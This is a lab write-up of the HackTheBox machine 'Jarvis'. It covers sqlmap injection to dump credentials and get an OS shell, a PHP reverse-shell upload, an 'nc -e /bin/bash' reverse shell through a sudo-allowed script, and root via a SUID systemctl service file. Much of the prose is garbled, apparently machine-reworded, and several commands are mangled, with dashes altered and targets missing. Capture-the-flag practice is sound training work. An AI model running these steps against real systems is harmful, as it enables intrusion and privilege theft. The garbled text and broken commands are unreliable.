Jarvis — HackTheBox Writeup

Jarvis is a Norman French surname (last name) linked to Saint Gervasius.
Its Latin meaning is “He who is skilled with a spear.”

Jarvis was a basic and fun box. I’ll begin by finding an SQLi in one of the site pages and get a fundamental shell utilizing sqlmap and afterwards sidestep a channel on a sudo record to get to the client banner. To get to the root, I’ll misuse a suid paired to acquire root shell

This is a writeup for the Jarvis machine



The primary activity is to figure out what services are running on the objective IP address by executing Nmap against IP.

The Nmap scan reveals 3 running services:
-SSH on port 22,
-Apache 2.4.25 on port 80 and 64999


We use the tool “Dirbuster” to scan the webserver to enumerate different files and folders.
I was able to find the PHPMyAdmin version which is v4.8.0 that is installed under Http://, which is exploitable via Local File.

The port 64999 always shows:

so, its a rabbit hole


Reading the HTML or navigating through the page you will eventually find a URL like this

Attempting SQL injection manually through the URL bar didn’t help. In this instance, so I have used sqlmap to do this task.

After a few trials of play with that parameter, I could found that it is vulnerable to SQL Injection.


sqlmap -u — random-agent — level 1 — risk 1 — hostname — current-user — users — passwords — batch

and by this, I was able to get the credentials

password hash and the clear-text

the sqlmap has successfully found the password which can be used to log in the PHPmyadmin page.

Now using sqlmap we can get a shell to Jarvis to do that I have used below command

sqlmap -u — crawl=3 — random-agent — level1 — risk 1 — os-shell — batch

we still can’t read the flag but we can execute commands inside the Host we can upload a PHP reverse shell and execute.

I have downloaded pentest monkey PHP reverse shell on the host:

Accessing this shell opens a real shell to the system which is www-data now to escalate the privileges on the system I have used PEASS (Privilege Escalation Awesome Scripts SUITE)

It is possible to execute this script as pepper.

Executing it, you will find that there is an option to ping an IP address:

To get a reverse connection I have used the below script:

script: echo “nc -e /bin/bash 5566” > rev2.sh

And now it can be called from the script created earlier:

sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

owning user: as pepper, I was able to read the user.txt file: 2afa36c4f05b37b34259c93551f5c44f(flag)

Root: Executing linpe as pepper I have easily found the root flag by privileges exploiting the SUID bit of systemctl.

Exploiting the SUID

To exploit it you have to create a new .service file:

pepper@jarvis:~$ cat /home/pepper/suidpe.service

This service file will execute a script whenever it is started

pepper@jarvis:~$ cat /home/pepper/pe.sh

cp /bin/bash /home/pepper/b; chmod +s /home/pepper/b

Finally create and execute the new service :

pepper@jarvis:~$ systemctl link /home/pepper/suidpe.service

pepper@jarvis:~$ systemctl enable — now


pepper@jarvis:~$ systemctl start suidpe.service

This will create a file /home/pepper/b (a copy of /bin/bash with the SUID set

by root).

upon executing it we get the root, and we can easly read the flag:

pepper@jarvis:~$ /home/pepper/b -p

b-4.4# cat /root/root.txt

d41d8cd98f00b204e9800998ecf84271(the root flag)

Wanna connect:

Linkedin: https://www.linkedin.com/in/akshay-jain-533a79111/

Email: Akshayjain5@protonmail.com

you can also visit my GitHub account: https://github.com/akshay1729